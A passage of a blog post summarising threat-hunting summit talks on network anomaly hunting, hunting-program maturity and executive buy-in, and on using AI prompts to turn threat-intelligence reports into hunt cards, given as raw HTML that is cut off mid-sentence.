href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#general-takeaways\" class=\"hash-link\" aria-label=\"Direct link to General Takeaways\" title=\"Direct link to General Takeaways\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Network threat hunting is about finding <mark>anomalies in behaviors</mark>, not just relying on static signatures.</li>\n<li class=\"\">Tools like RITA simplify this by abstracting raw packets into actionable connection summaries.</li>\n<li class=\"\">Regularly reviewing RITA's output helps build a baseline of \"normal\" for your network, making malicious behavior and security gaps stand out faster.</li>\n</ul>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"talk-4-threat-hunting-in-the-dark-a-practical-approach-by-shane-hartman\">Talk 4: \"Threat Hunting in the Dark: A Practical Approach\" by Shane Hartman<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#talk-4-threat-hunting-in-the-dark-a-practical-approach-by-shane-hartman\" class=\"hash-link\" aria-label=\"Direct link to Talk 4: &quot;Threat Hunting in the Dark: A Practical Approach&quot; by Shane Hartman\" title=\"Direct link to Talk 4: &quot;Threat Hunting in the Dark: A Practical Approach&quot; by Shane Hartman\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-finding-bad-doesnt-work\">Why \"Finding BAD\" Doesn't Work<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#why-finding-bad-doesnt-work\" class=\"hash-link\" aria-label=\"Direct link to Why &quot;Finding BAD&quot; Doesn't Work\" title=\"Direct link to Why &quot;Finding BAD&quot; Doesn't Work\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-missing-context-and-focus\">The Missing Context and Focus<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-missing-context-and-focus\" class=\"hash-link\" aria-label=\"Direct link to The Missing Context and Focus\" title=\"Direct link to The Missing Context and Focus\" translate=\"no\">​</a></h4>\n<p>Many organizations start their threat hunting programs with the vague objective of \"finding bad,\" as the managers are not technical and don't know how to put this up, so the threat hunters have questions in mind like -</p>\n<ul>\n<li class=\"\">What does finding \"bad\" actually mean?</li>\n<li class=\"\">Are you trying to find an active attacker, confirm an existing breach, or just identify employees behaving badly?</li>\n</ul>\n<p>It also lacks focus, leaving teams unsure if they should concentrate their attention on infrastructure, the perimeter, services, or the cloud.</p>\n<ul>\n<li class=\"\">Finally, it fails to define success; if we find bad, is that now considered an incident?</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-no-win-situation\">The \"No-Win\" Situation<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-no-win-situation\" class=\"hash-link\" aria-label=\"Direct link to The &quot;No-Win&quot; Situation\" title=\"Direct link to The &quot;No-Win&quot; Situation\" translate=\"no\">​</a></h3>\n<p>Hartman points out that building a program solely to look for \"bad\" creates a literal <mark>\"no-win situation\"</mark> for the security team:</p>\n<ul>\n<li class=\"\"><strong>If you do find bad:</strong> You now have an active incident on your hands. The organization has to immediately address the situation, which requires time, resources, and often causes business disruption.</li>\n<li class=\"\"><strong>If you don't find bad:</strong> You are left empty-handed when asked to prove the value of your time. Simply showing your manager a list of cool technical queries you ran does not demonstrate Return on Investment (ROI) or justify the hunting program's ongoing budget.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"where-do-you-start\">Where Do You Start?<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#where-do-you-start\" class=\"hash-link\" aria-label=\"Direct link to Where Do You Start?\" title=\"Direct link to Where Do You Start?\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"types-of-threat-hunts\">Types of Threat Hunts<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#types-of-threat-hunts\" class=\"hash-link\" aria-label=\"Direct link to Types of Threat Hunts\" title=\"Direct link to Types of Threat Hunts\" translate=\"no\">​</a></h4>\n<p>Threat hunting is primarily a proactive activity used to identify threats that may have evaded detection. However, hunts can take several different forms:</p>\n<ul>\n<li class=\"\"><strong>Reactive:</strong> Acting upon specific information, such as Threat Intel or Indicators of Compromise (IoCs).</li>\n<li class=\"\"><strong>Telemetry / Posture:</strong> Hunts based on the environment itself, often referred to as <em>\"watching the watchers\"</em>.</li>\n<li class=\"\"><strong>Proactive:</strong> Hypothesis-driven hunts exploring \"what if\" scenarios and how an attack would function.</li>\n<li class=\"\"><strong>Retro-Hunts:</strong> The process of repeating a previous hunt.</li>\n<li class=\"\">You can also use a Threat Hunting framework.</li>\n</ul>\n<blockquote>\n<p><em>The ultimate goal of threat hunting is to <mark>improve the overall security posture</mark> of the organization.</em></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-threat-hunting-maturity-model-where-are-you\">The Threat Hunting Maturity Model: Where Are You?<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-threat-hunting-maturity-model-where-are-you\" class=\"hash-link\" aria-label=\"Direct link to The Threat Hunting Maturity Model: Where Are You?\" title=\"Direct link to The Threat Hunting Maturity Model: Where Are You?\" translate=\"no\">​</a></h3>\n<p>Before diving into specific telemetry or posture hunts, it helps to understand your current operational level. Referencing a framework created by <em>David Bianco</em>, Hartman outlines five tiers of threat hunting maturity:</p>\n<ul>\n<li class=\"\"><strong>Tier 0 (Initial):</strong> Relies primarily on automated alerting. There is little or no routine data collection.</li>\n<li class=\"\"><strong>Tier 1 (Minimal):</strong> Incorporates threat intelligence IOC searches. Features a moderate to high level of data collection.</li>\n<li class=\"\"><strong>Tier 2 (Procedural):</strong> Follows analysis procedures created by others. Maintains high or very high data collection.</li>\n<li class=\"\"><strong>Tier 3 (Innovative):</strong> Creates new data analysis procedures. High or very high data collection. At this stage, teams are producing real, actionable analysis.</li>\n<li class=\"\"><strong>Tier 4 (Leading):</strong> Automates the majority of successful analysis procedures.</li>\n</ul>\n<p>Hartman noted that most organizations are currently sitting in tiers 0, 1, or 2, or a hybrid of those levels. In these early stages, teams might merely use EDR to pick up IOCs or centralize logs without actively reviewing them unless an alert triggers. They lack a formalized structure.</p>\n<p>The goal is to transition out of the initial procedural stages and into the <em>\"Innovative\"</em> and <em>\"Leading\"</em> tiers. Reaching this maturity allows threat hunting to become automated and highly useful to other departments, such as the SOC, Red Team, Detection Engineering, and Cyber Threat Intelligence (CTI). For example, if CTI reports a new vulnerability, a leading program can simply qualify that they have already searched for and mitigated the issue, rather than having to spin up a reactionary, ad-hoc threat hunt.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"telemetry-and-posture-hunting\">Telemetry and Posture Hunting<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#telemetry-and-posture-hunting\" class=\"hash-link\" aria-label=\"Direct link to Telemetry and Posture Hunting\" title=\"Direct link to Telemetry and Posture Hunting\" translate=\"no\">​</a></h3>\n<p>These hunts start out with a foundational question: <mark>\"How do we know what we know?\"</mark>. IT might assure us that EDR is fully deployed, all assets are known, and subnets are documented. We might believe we know what our cloud environments look like and that our logs are perfectly centralized. However, asking the question might reveal that Linux or Mac logs are missing entirely. If you don't ask the question, you will never realize there is a gap you cannot see into.</p>\n<p>You must also ensure coverage across perimeters, firewalls, and third-party VPNs, as you never know where a threat group might pivot. You need to have the telemetry data first before you can actually hunt for threats.</p>\n<p>The most practical approach is to assume there are gaps and actively hunt for them to validate these claims. A critical outcome of finding a gap is feeding that information back into the threat hunt process to answer what might not have been seen while the gap was in place.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-do-i-know-i-have-full-edr-coverage\">How Do I Know I Have Full EDR Coverage?<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#how-do-i-know-i-have-full-edr-coverage\" class=\"hash-link\" aria-label=\"Direct link to How Do I Know I Have Full EDR Coverage?\" title=\"Direct link to How Do I Know I Have Full EDR Coverage?\" translate=\"no\">​</a></h4>\n<p>A practical example of \"watching the watchers\" is verifying your EDR deployment. Hartman provided a mathematical breakdown for this simple telemetry hunt:</p>\n<ul>\n<li class=\"\">Get the number of end points covered – <code>X</code> .</li>\n<li class=\"\">Query inventory system (a control system based on process) – <code>Y1</code>.</li>\n<li class=\"\">Query Active directory (an authentication system) – <code>Y2</code>.</li>\n<li class=\"\">Query IP Space in Use (the physical network space) – <code>Y3</code>.</li>\n<li class=\"\">Remove non-endpoint compliant devices – ie. Routers.</li>\n<li class=\"\"><code>(X - Y1)</code> – Diff in Inventory system.</li>\n<li class=\"\"><code>(X - Y2)</code> – Diff in AD.</li>\n<li class=\"\"><code>(X - Y3)</code> – Diff in IP Space.</li>\n</ul>\n<p>Any discrepancies reveal clear gaps in telemetry. When you work to close these gaps and bring the numbers closer to zero, this gap closure can be reported to leadership as a <mark>reduction in exposure</mark>.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"other-questions--hunts\">Other Questions / Hunts<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#other-questions--hunts\" class=\"hash-link\" aria-label=\"Direct link to Other Questions / Hunts\" title=\"Direct link to Other Questions / Hunts\" translate=\"no\">​</a></h4>\n<p>There are numerous other simple questions you can ask to confirm the correct data is collected:</p>\n<ul>\n<li class=\"\"><strong>Network Space:</strong> How much of your static IP space is occupied? This is where your server or core infrastructure often lives. Would you know if a new system showed up or if one was decommissioned?</li>\n<li class=\"\"><strong>Log Review:</strong> Do you collect PowerShell logs? If so, what kind of information can you garner from them? Can you review and hunt DNS Logs?</li>\n<li class=\"\"><strong>Software Inventory:</strong> How many versions of Java are in the environment? Do you have Remote Management (RMM) tools like TeamViewer or ScreenConnect that attackers leverage to get into networks?</li>\n<li class=\"\"><strong>Account Management:</strong> Are service accounts staying within the designated areas? Do you even have an inventory of service accounts to know where they are supposed to be?</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"focusing-on-the-crown-jewels\">Focusing on the Crown Jewels<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#focusing-on-the-crown-jewels\" class=\"hash-link\" aria-label=\"Direct link to Focusing on the Crown Jewels\" title=\"Direct link to Focusing on the Crown Jewels\" translate=\"no\">​</a></h4>\n<p>A significant portion of your hunting emphasis should lie with the organization's <strong>\"Crown Jewels\"</strong>. Identifying these assets relies on asset management, Business Impact Analysis, Business Continuity Plans, and Disaster Recovery procedures. These critical assets could include employee and client information, HR data, proprietary information, and core web applications. Hunters need to define the specific threats targeting these assets, understand what would happen if they were compromised, and develop hunts to address these specific hypotheses.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"proactive-threat-hunting-approaches\">Proactive Threat Hunting Approaches<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#proactive-threat-hunting-approaches\" class=\"hash-link\" aria-label=\"Direct link to Proactive Threat Hunting Approaches\" title=\"Direct link to Proactive Threat Hunting Approaches\" translate=\"no\">​</a></h3>\n<p>When shifting into proactive hunting, there are four primary methodologies you can leverage:</p>\n<ul>\n<li class=\"\"><strong>Hypothesis Driven:</strong> Grounded in organizational reality, this involves identifying the most likely attack vectors for your specific industry and mapping them back to MITRE ATT&amp;CK techniques (e.g., hunting for persistence via scheduled tasks under T1053).</li>\n<li class=\"\"><strong>Intelligence Driven:</strong> This relies on details gathered from news feeds, articles, and intelligence sources. Hunters must determine if the intelligence is relevant to their organization, gather the TTPs, IoCs, and IOAs, and then build the hunt.</li>\n<li class=\"\"><strong>Anomaly-Based:</strong> Looking for deviations from normal baselines that may or may not appear as statistics. Examples include users running LOLBins, executing large outbound data transfers, or attempting privileged cloud API calls.</li>\n<li class=\"\"><strong>Analytics Driven:</strong> Driven primarily by statistical data and machine learning patterns. Examples include spotting DNS tunneling, long-lived cloud credential creation, or the use of limited/unusual protocols.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"securing-the-bag-executive-buy-in\">Securing the Bag: Executive Buy-In<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#securing-the-bag-executive-buy-in\" class=\"hash-link\" aria-label=\"Direct link to Securing the Bag: Executive Buy-In\" title=\"Direct link to Securing the Bag: Executive Buy-In\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"translating-tech-to-business-value\">Translating Tech to Business Value<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#translating-tech-to-business-value\" class=\"hash-link\" aria-label=\"Direct link to Translating Tech to Business Value\" title=\"Direct link to Translating Tech to Business Value\" translate=\"no\">​</a></h4>\n<p>A crucial realization for the longevity of any hunting program is that <mark>executives do not fund \"cool technical queries\"</mark>.</p>\n<ul>\n<li class=\"\">They are interested in funding <strong>risk reduction</strong>, <strong>cost avoidance</strong>, <strong>operational resilience</strong>, and <strong>board/shareholder equity</strong>.</li>\n<li class=\"\">Conversely, they want to avoid reputational damage, liability exposure, regulatory/compliance violations, and business disruption.</li>\n</ul>\n<p>To secure buy-in, you must speak their language and translate technical findings into tangible business value:</p>\n<ul>\n<li class=\"\"><strong>The Risk Reduction Frame:</strong> Move away from saying <em>\"We searched for T1078.\"</em> Instead, explain that you verified and closed detection blind spots across 40% of the cloud credential access techniques used by active threat groups this quarter.</li>\n<li class=\"\"><strong>The Cost Avoidance Frame:</strong> Highlight that the global average cost of a data breach sits north of <strong>$4.4M</strong>, with an average containment lifecycle of <strong>200+ days</strong>. Show how proactive hunting directly shrinks the Mean Time to Detect (MTTD), catching the attacker before lateral movement and ransomware deployment.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"metrics-leadership-actually-cares-about\">Metrics Leadership Actually Cares About<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#metrics-leadership-actually-cares-about\" class=\"hash-link\" aria-label=\"Direct link to Metrics Leadership Actually Cares About\" title=\"Direct link to Metrics Leadership Actually Cares About\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\"><strong>Mean Time to Detect (MTTD)</strong></li>\n<li class=\"\"><strong>Mean Time to Respond (MTTR)</strong></li>\n<li class=\"\"><strong>False Positive Reduction:</strong> Showing how hunt findings are refined to reduce noise, creating analyst capacity back for the SOC.</li>\n<li class=\"\"><strong>ATT&amp;CK Coverage Delta:</strong> The percentage increase in validated detection coverage over time.</li>\n<li class=\"\"><strong>Data Source Health:</strong> The identification of blind spots before an incident actually occurs.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"common-pitfalls-and-key-takeaways\">Common Pitfalls and Key Takeaways<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#common-pitfalls-and-key-takeaways\" class=\"hash-link\" aria-label=\"Direct link to Common Pitfalls and Key Takeaways\" title=\"Direct link to Common Pitfalls and Key Takeaways\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"pitfalls-to-avoid\">Pitfalls to Avoid<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#pitfalls-to-avoid\" class=\"hash-link\" aria-label=\"Direct link to Pitfalls to Avoid\" title=\"Direct link to Pitfalls to Avoid\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">Executing generic or simple hunts that don't reflect your actual threat landscape or are already primarily covered by EDR alerting.</li>\n<li class=\"\">Missing key stakeholders with interest and buy-in.</li>\n<li class=\"\">Failing to mature the program over time.</li>\n<li class=\"\">Over-relying strictly on IoCs and ignoring operational baselines or environmental context.</li>\n<li class=\"\">Treating hunts as one-time events rather than an ongoing program.</li>\n<li class=\"\">As noted in the presentation, a poorly executed threat hunt becomes a checkbox exercise where nothing is gained, and nothing is learned.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"key-takeaways\">Key Takeaways<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#key-takeaways\" class=\"hash-link\" aria-label=\"Direct link to Key Takeaways\" title=\"Direct link to Key Takeaways\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\">Ground every single scenario in your real threat landscape.</li>\n<li class=\"\">Define SMART objectives before developing a hunt.</li>\n<li class=\"\">The overarching goal is to elevate the security posture and awareness.</li>\n<li class=\"\">Keep track of your hunts and meticulously document the output.</li>\n<li class=\"\">Always be looking for ways to automate and mature the program.</li>\n<li class=\"\">Remember the core management principle: <mark>The overarching goal is to improve your security posture, not chase unicorns.</mark></li>\n</ul>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"talk-5-fast-track-reports-into-ready-made-hypotheses-with-ai-by-lauren-proehl\">Talk 5: \"Fast-track Reports into Ready-Made Hypotheses with AI\" by Lauren Proehl<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#talk-5-fast-track-reports-into-ready-made-hypotheses-with-ai-by-lauren-proehl\" class=\"hash-link\" aria-label=\"Direct link to Talk 5: &quot;Fast-track Reports into Ready-Made Hypotheses with AI&quot; by Lauren Proehl\" title=\"Direct link to Talk 5: &quot;Fast-track Reports into Ready-Made Hypotheses with AI&quot; by Lauren Proehl\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"introduction-5\">Introduction<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#introduction-5\" class=\"hash-link\" aria-label=\"Direct link to Introduction\" title=\"Direct link to Introduction\" translate=\"no\">​</a></h3>\n<p>The talk focuses on the challenge of converting Threat Intelligence (TI) reports into actionable hypotheses. The core problem is that many TI reports just sit in email inboxes or Slack channels due to sheer volume and lack of prioritization. Lauren emphasizes <em>\"intel-driven hunting,\"</em> comparing it to a bank in Chicago that shouldn't hunt for malware targeting North Korean grocery stores. Threat hunters need to extract behaviors and connect the dots to create testable hypotheses, which is the first step toward using AI effectively.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-4-part-contract-the-steps\">The 4-Part Contract (The Steps)<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-4-part-contract-the-steps\" class=\"hash-link\" aria-label=\"Direct link to The 4-Part Contract (The Steps)\" title=\"Direct link to The 4-Part Contract (The Steps)\" translate=\"no\">​</a></h3>\n<p>Lauren created a contract to ensure that an intelligence report becomes a structured and testable hypothesis, not just a summary or a list of IOCs. <mark>If the model can't fill all details, the hunt doesn't exist</mark> and needs more work. The process includes four non-negotiable steps for every report:</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-1-extract-tradecraft-drop-the-noise\">Step 1: Extract Tradecraft, Drop the Noise<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#step-1-extract-tradecraft-drop-the-noise\" class=\"hash-link\" aria-label=\"Direct link to Step 1: Extract Tradecraft, Drop the Noise\" title=\"Direct link to Step 1: Extract Tradecraft, Drop the Noise\" translate=\"no\">​</a></h4>\n<p>The first step focuses on pulling out behaviors and sequences while dropping volatile indicators.</p>\n<ul>\n<li class=\"\"><strong>Keep:</strong> Process lineage &amp; command-line patterns, persistence, C2, lateral movement, cred access, discovery, evasion, impact. Every variant (e.g., 3 C2 transports = 3 hunts).</li>\n<li class=\"\"><strong>Drop:</strong> Hashes and single-use file names, rotating TryCloudflare subdomains, decoy domains, and anything that changes in the next intrusion (unless relevant to behavior context, like exfiltration to Google Drive).</li>\n</ul>\n<blockquote>\n<p><strong>The Prompt That Does It:</strong>\n<em>\"From the report below, extract EVERY distinct behavior across the whole intrusion: process lineage, LOLBins, persistence, C2 technique, lateral movement, cred access, discovery, defense evasion, impact. List each variant — don't collapse them. IGNORE hashes, IPs, and single-use domains. Tag each with its kill-chain phase and the actual command / path. End with a count so nothing drops downstream.\"</em></p>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-2-map-to-attck-then-check-the-models-work\">Step 2: Map to ATT&amp;CK, Then Check the Model's Work<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#step-2-map-to-attck-then-check-the-models-work\" class=\"hash-link\" aria-label=\"Direct link to Step 2: Map to ATT&amp;CK, Then Check the Model's Work\" title=\"Direct link to Step 2: Map to ATT&amp;CK, Then Check the Model's Work\" translate=\"no\">​</a></h4>\n<p>AI models often hallucinate or use stale training data, so mapping behaviors correctly is critical.</p>\n<ul>\n<li class=\"\"><strong>Where the model lies:</strong> It invents technique IDs that look right but don't exist, picks parent techniques instead of specific sub-techniques, and maps the tool rather than the behavior.</li>\n<li class=\"\"><strong>Solution:</strong> Always diff against the live matrix. The prompt uses an MCP (Model Context Protocol) to query the live MITRE ATT&amp;CK matrix to validate IDs. If it cannot verify, the model must flag it with <code>[VERIFY]</code> for human review.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-3-a-hunt-is-only-real-if-you-can-run-it\">Step 3: A Hunt is Only Real if You Can Run It<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#step-3-a-hunt-is-only-real-if-you-can-run-it\" class=\"hash-link\" aria-label=\"Direct link to Step 3: A Hunt is Only Real if You Can Run It\" title=\"Direct link to Step 3: A Hunt is Only Real if You Can Run It\" translate=\"no\">​</a></h4>\n<p>You must define the exact data sources and event IDs required for the hunt. <mark>If the telemetry doesn't exist, that itself is a finding</mark> (a coverage gap).</p>\n<ul>\n<li class=\"\"><strong>Data Sources to specify:</strong>\n<ul>\n<li class=\"\"><strong>Process / EDR:</strong> DeviceProcessEvents, ImageLoad, Sysmon 1/7, Sec 4688.</li>\n<li class=\"\"><strong>Network Egress:</strong> DeviceNetworkEvents, DNS / Sysmon 22, proxy + TLS SNI.</li>\n<li class=\"\"><strong>Identity / AD:</strong> Sec 4769 / 4624 / 5136, Sentinel SecurityEvent (DC).</li>\n<li class=\"\"><strong>Cloud Audit:</strong> DeviceProcessEvents (rclone) - 7045 - egress proxy / SWG.</li>\n</ul>\n</li>\n<li class=\"\">The AI should output analytic logic (like KQL, SPL, or Sigma) based on publicly available documentation to give hunters a starting point.</li>\n</ul>\n<blockquote>\n<p><em>Hearth automatically filters hypotheses based on your available data sources so coverage gaps are obvious before starting.</em></p>\n</blockquote>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-4-the-output--a-hunt-card\">Step 4: The Output — A Hunt Card<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#step-4-the-output--a-hunt-card\" class=\"hash-link\" aria-label=\"Direct link to Step 4: The Output — A Hunt Card\" title=\"Direct link to Step 4: The Output — A Hunt Card\" translate=\"no\">​</a></h4>\n<p>The final output is a repeatable shape for every hypothesis that scales from a solo hunter's notebook to a program's backlog. It includes six components:</p>\n<ol>\n<li class=\"\"><strong>Hypothesis:</strong> One sentence describing the behavior you expect to find.</li>\n<li class=\"\"><strong>ATT&amp;CK:</strong> Verified Technique ID and name.</li>\n<li class=\"\"><strong>Data Source:</strong> Named tables &amp; Event IDs (never just \"EDR\").</li>\n<li class=\"\"><strong>Analytic Logic:</strong> A real, runnable query (e.g., KQL, SPL, Sigma).</li>\n<li class=\"\"><strong>Validation:</strong> Expected hits and known false positives to baseline.</li>\n<li class=\"\"><strong>PEAK Category:</strong> Hypothesis-driven, Baseline, or Model-assisted.</li>\n</ol>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"prompt-crafting\">Prompt Crafting<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#prompt-crafting\" class=\"hash-link\" aria-label=\"Direct link to Prompt Crafting\" title=\"Direct link to Prompt Crafting\" translate=\"no\">​</a></h3>\n<p>What turns a basic summary into a runnable hypothesis? Lauren shared these prompt engineering pointers:</p>\n<ul>\n<li class=\"\"><strong>Frame the role:</strong> Explicitly tell the AI it's a <em>\"Senior hunter, not a chatbot.\"</em> This changes the quality of the output.</li>\n<li class=\"\"><strong>Cover it all:</strong> Instruct it to extract <em>every</em> behavior and variant, not just the flashy ones.</li>\n<li class=\"\"><strong>Real fields only:</strong> Demand named tables and Event IDs, explicitly stating <em>\"no invented operators.\"</em></li>\n<li class=\"\"><strong>Validate always:</strong> Ensure expected hits and false positives are baselined.</li>\n<li class=\"\"><strong>Ban indicators:</strong> Reject answers that are just <mark>\"IOCs in a trench coat.\"</mark></li>\n</ul>\n<blockquote>\n<p><strong>The System Prompt:</strong>\n<em>\"You are a senior threat hunter, not a chatbot. You turn threat reports into hunts a hunter can run today — rigorous and skeptical of your own output.</em>\n<em>Rules you never break:</em>\n<em>- Hunt BEHAVIOR, not indicators.</em>\n<em>- Map to ATT&amp;CK by behavior; use the most specific sub-technique. Unsure an ID exists? Say so — never invent one.</em>\n<em>- Ground every query ONLY in that hunt's named data source.</em>\n<em>- Every hypothesis ships with validation: expected hits AND the false positives to baseline.</em>\n<em>- Firm, narrow, specific. One behavior per hypothesis.\"</em></p>\n</blockquote>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-run-one-report-fourteen-runnable-hunts\">The Run: One Report, Fourteen Runnable Hunts<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#the-run-one-report-fourteen-runnable-hunts\" class=\"hash-link\" aria-label=\"Direct link to The Run: One Report, Fourteen Runnable Hunts\" title=\"Direct link to The Run: One Report, Fourteen Runnable Hunts\" translate=\"no\">​</a></h3>\n<p>Lauren showcased how she applied this structure to a real-world example: <em>The DFIR Report, May 2026 — EtherRAT -&gt; TukTuk -&gt; The Gentleman</em>. By pasting the full report link along with the one-shot prompt, the AI processed the entire intrusion chain.</p>\n<p>The single run successfully:</p>\n<ul>\n<li class=\"\">Extracted every behavior and variant.</li>\n<li class=\"\">Mapped them to ATT&amp;CK (flagging 4 technique IDs for human verification).</li>\n<li class=\"\">Scoped specific named tables and Event IDs.</li>\n<li class=\"\">Generated <strong>14 deep, runnable KQL hunt cards</strong> while identifying <strong>4 coverage gaps</strong>.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"hunt-card-examples\">Hunt Card Examples<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#hunt-card-examples\" class=\"hash-link\" aria-label=\"Direct link to Hunt Card Examples\" title=\"Direct link to Hunt Card Examples\" translate=\"no\">​</a></h3>\n<p>Here are three of the sharpest hunt cards generated from that single prompt <em>(more examples are available on her GitHub repository)</em>:</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"1-web3-c2-resolution\">1. Web3 C2 Resolution<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#1-web3-c2-resolution\" class=\"hash-link\" aria-label=\"Direct link to 1. Web3 C2 Resolution\" title=\"Direct link to 1. Web3 C2 Resolution\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Hypothesis:</strong> Endpoints with no business touching Web3 are resolving C2 through blockchain and decentralized storage.</li>\n<li class=\"\"><strong>Data Source:</strong> Defender DeviceNetworkEvents · DNS / Sysmon 22 · proxy SNI</li>\n<li class=\"\"><strong>Validation:</strong> Dev and blockchain teams are the known false positives. Baseline expected Web3 usage first, then alert on the rest.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"2-trojanized-signed-binaries\">2. Trojanized Signed Binaries<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#2-trojanized-signed-binaries\" class=\"hash-link\" aria-label=\"Direct link to 2. Trojanized Signed Binaries\" title=\"Direct link to 2. Trojanized Signed Binaries\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Hypothesis:</strong> Legitimate signed apps are running from odd paths and making outbound connections after DLL sideloading.</li>\n<li class=\"\"><strong>Data Source:</strong> DeviceImageLoadEvents + DeviceNetworkEvents · Sysmon 7</li>\n<li class=\"\"><strong>Validation:</strong> Pin known-good install paths and update channels. Anything outside them on a server is worth a look.</li>\n</ul>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"3-rmm-as-a-c2-channel\">3. RMM as a C2 Channel<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#3-rmm-as-a-c2-channel\" class=\"hash-link\" aria-label=\"Direct link to 3. RMM as a C2 Channel\" title=\"Direct link to 3. RMM as a C2 Channel\" translate=\"no\">​</a></h4>\n<ul>\n<li class=\"\"><strong>Hypothesis:</strong> Remote management tooling is installed or running outside the approved inventory.</li>\n<li class=\"\"><strong>Data Source:</strong> Security 7045 · Defender DeviceNetworkEvents (RMM SNI)</li>\n<li class=\"\"><strong>Validation:</strong> Your approved RMM allowlist is the oracle. The hunt is only as good as that inventory, so build it first.</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"hearth-runs-the-loop-for-the-community\">HEARTH Runs the Loop for the Community<a href=\"https://haxnation.github.io/blog/antisyphon-training-thrunting-summit-2026-summary#hearth-runs-the-loop-for-the-community\" class=\"hash-link\" aria-label=\"Direct link to HEARTH Runs the Loop for the Community\" title=\"Direct link to HEARTH Runs the Loop for the Community\" translate=\"no\">​</a></h3>\n<p>Lauren and the team have already built a system that automates this entire loop for the community, called 